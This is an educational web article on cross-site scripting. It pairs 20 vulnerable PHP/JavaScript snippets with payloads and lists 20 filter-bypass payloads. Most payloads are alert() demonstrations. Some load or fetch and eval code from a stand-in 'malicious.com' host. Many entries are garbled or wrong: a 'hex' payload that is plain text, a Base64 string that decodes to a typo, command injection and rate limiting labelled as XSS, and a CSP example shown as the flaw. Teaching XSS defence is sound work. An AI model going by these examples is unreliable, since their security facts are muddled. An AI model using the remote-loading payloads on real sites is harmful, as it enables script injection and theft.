Understanding Cross Site Scripting (XSS) By Maloy Roy Orko

What is Cross Site Scripting?

Cross Site Scripting (XSS) is a type of security vulnerability found in web applications. It allows attackers to inject malicious scripts into content that is served to other users. This can lead to various attacks, such as stealing cookies, session tokens, or any sensitive information.

Common Backend Coding Mistakes Leading to XSS

Here are 20 common backend coding mistakes that can lead to XSS vulnerabilities, along with examples of how they can be exploited:

• 1. Not Sanitizing User Input:

  Code:

  <?php $comment = $_POST['comment']; ?> <div><?php echo $comment; ?></div>

  Payload:

  <script>alert('XSS')</script>

  This payload will execute when the comment is displayed. Patch: Sanitize input before rendering.

• 2. Improperly Escaping Output:

  Code:

  <h1>Welcome, <?php echo $_GET['name']; ?></h1>

  Payload:

  <script>alert('XSS')</script>

  This script will execute if name is unsanitized. Patch: Use htmlspecialchars.

• 3. Using eval() on User Input:

  Code:

  <?php eval($_GET['code']); ?>

  Payload:

  alert('XSS');

  This allows arbitrary code execution. Patch: Avoid using eval and validate inputs strictly.

• 4. Allowing HTML in User Profiles:

  Code:

  <?php $bio = $_POST['bio']; ?> <div><?php echo $bio; ?></div>

  Payload:

  <script>alert('XSS')</script>

  Unsanitized user input can execute scripts. Patch: Strip tags or sanitize.

• 5. Using Dangerous HTML Attributes:

  Code:

  <img src="image.jpg" onclick="alert('XSS')">

  Payload:

  <img src=x onerror=alert('XSS')>

  Exploiting inline event handlers. Patch: Avoid inline event handlers.

• 6. Not Validating File Uploads:

  Code:

  <form action="upload.php" method="post"> <input type="file" name="file"> </form>

  Payload:

  <script>alert('XSS')</script>

  Uploading files containing scripts. Patch: Validate file types and content.

• 7. Exposing Sensitive Data in APIs:

  Code:

  <?php echo json_encode($_GET); ?>

  Payload:

  <script>alert('XSS')</script>

  Exposed data can include scripts. Patch: Validate and sanitize API responses.

• 8. Ignoring Security Features of Frameworks:

  Code:

  <?php echo $userInput; ?>

  Payload:

  <script>alert('XSS')</script>

  Not using built-in escaping functions. Patch: Use the framework's security features.

• 9. Not Using HTTPOnly Cookies:

  Code:

  setcookie("session", $sessionId);

  Payload:

  alert(document.cookie)

  JavaScript can access cookies. Patch: Set cookies with HTTPOnly flag.

• 10. Not Implementing Content Security Policy (CSP):

  Code:

  <meta http-equiv="Content-Security-Policy" content="default-src 'self'">

  Payload:

  <script src="http://malicious.com/xss.js"></script>

  Without CSP, external scripts can be loaded. Patch: Implement a strong CSP.

• 11. Using untrusted data in JavaScript:

  Code:

  document.getElementById('output').innerHTML = userInput;

  Payload:

  <script>alert('XSS')</script>

  This directly inserts user input. Patch: Use textContent instead of innerHTML.

• 12. Exposing Debug Information:

  Code:

  echo $errorMessage;

  Payload:

  <script>alert('XSS')</script>

  Debug info can reveal vulnerabilities. Patch: Disable debug messages in production.

• 13. Using Dangerous Functions:

  Code:

  system($_GET['cmd']);

  Payload:

  cmd=;alert('XSS');

  Arbitrary code execution is possible. Patch: Avoid functions that execute arbitrary code.

• 14. Not Validating User Input Length:

  Code:

  $comment = $_POST['comment'];

  Payload:

  <script>alert('XSS')</script>

  Long inputs may bypass security measures. Patch: Limit input length and validate.

• 15. Allowing Unfiltered User Comments:

  Code:

  $comments[] = $_POST['comment'];

  Payload:

  <script>alert('XSS')</script>

  User comments can execute scripts. Patch: Filter and escape comments.

• 16. Using Non-Whitelisted URL Redirects:

  Code:

  header("Location: " . $_GET['url']);

  Payload:

  url=http://malicious.com

  Redirecting users to malicious sites. Patch: Whitelist allowed URLs.

• 17. Ignoring Secure Coding Practices:

  Code:

  $userInput = $_GET['input'];

  Payload:

  <script>alert('XSS')</script>

  Not following secure coding guidelines. Patch: Train developers on secure practices.

• 18. Using Non-secure HTTP:

  Code:

  http://example.com/api

  Payload:

  http://malicious.com

  Data can be intercepted. Patch: Use HTTPS to secure data transmission.

• 19. Using Deprecated Libraries:

  Code:

  include("old_library.php");

  Payload:

  <script>alert('XSS')</script>

  Using libraries that may have vulnerabilities. Patch: Regularly update libraries.

• 20. Not Implementing Rate Limiting:

  Code:

  if ($_SESSION['requests'] > 100) { /* block */ }

  Payload:

  <script>alert('XSS')</script>

  Brute force attacks can occur. Patch: Implement rate limiting for sensitive actions.

Bypassing XSS Payloads

Here are 20 common bypass payloads with explanations:

• 1. URL Encoding:

  Payload: %3Cscript%3Ealert('XSS')%3C/script%3E

  Encoding the script tag to bypass filters.

• 2. Hexadecimal Encoding:

  Payload: <script>alert('XSS')</script>

  Using hex encoding for the characters to evade detection.

• 3. Base64 Encoding:

  Payload: PHNjcmlwdD5hbGVydCgnWFRTJyk8L3NjcmlwdD4=

  Base64 encoding the script to bypass input filters.

• 4. Inline Event Handlers:

  Payload: <img src=x onerror=alert('XSS')>

  Using onerror to execute scripts when an image fails to load.

• 5. Using svg Tags:

  Payload: <svg/onload=alert('XSS')>

  Using SVG to execute JavaScript on load.

• 6. Self-Closing Tags:

  Payload: <div style="background-image:url(javascript:alert('XSS'))">

  Using CSS to execute JavaScript.

• 7. Comment Tags:

  Payload: <script>alert('XSS')//</script>

  Using comments to hide malicious code from filters.

• 8. Using iframe Tags:

  Payload: <iframe src="javascript:alert('XSS')"></iframe>

  Embedding JavaScript within an iframe.

• 9. Using link Tags:

  Payload: <link rel="stylesheet" href="javascript:alert('XSS')">

  Exploiting link tags to execute scripts.

• 10. Using style Tags:

  Payload: <style>body{background:url(javascript:alert('XSS'));}</style>

  Injecting JavaScript via CSS background.

• 11. Using `setTimeout`:

  Payload: <script>setTimeout('alert(\"XSS\")', 1000);</script>

  Delaying execution of the script.

• 12. Using `window.location`:

  Payload: javascript:window.location='http://malicious.com'

  Redirecting users to malicious sites.

• 13. Using `document.write`:

  Payload: document.write('<script>alert(\"XSS\")</script>');

  Injecting scripts via document.write.

• 14. Using `XMLHttpRequest`:

  Payload: var xhr = new XMLHttpRequest(); xhr.open('GET', 'http://malicious.com', true); xhr.send();

  Exploiting XMLHttpRequest to fetch malicious scripts.

• 15. Using `fetch` API:

  Payload: fetch('http://malicious.com').then(response => response.text()).then(data => eval(data));

  Using fetch to execute potentially malicious scripts.

• 16. Using `arguments.callee`:

  Payload: <script>alert(arguments.callee);</script>

  This can bypass some security filters.

• 17. Using double encoding:

  Payload: <script>alert('XSS')</script> (encoded twice)

  By encoding the payload multiple times, it may bypass certain filters.

• 18. Using `Object` constructor:

  Payload: new Function('alert(\'XSS\')')();

  Using Function constructor to execute code.

• 19. Using `src` attributes:

  Payload: <script src="http://malicious.com/xss.js"></script>

  Loading an external script from a malicious source.

• 20. Using JSONP:

  Payload: callback=alert('XSS')

  Exploiting JSONP responses to execute scripts.

Conclusion

Cross Site Scripting is a serious vulnerability that can have significant consequences for web applications and their users. By understanding how XSS works, recognizing common coding mistakes, and implementing effective prevention techniques, developers can help protect their applications from such attacks.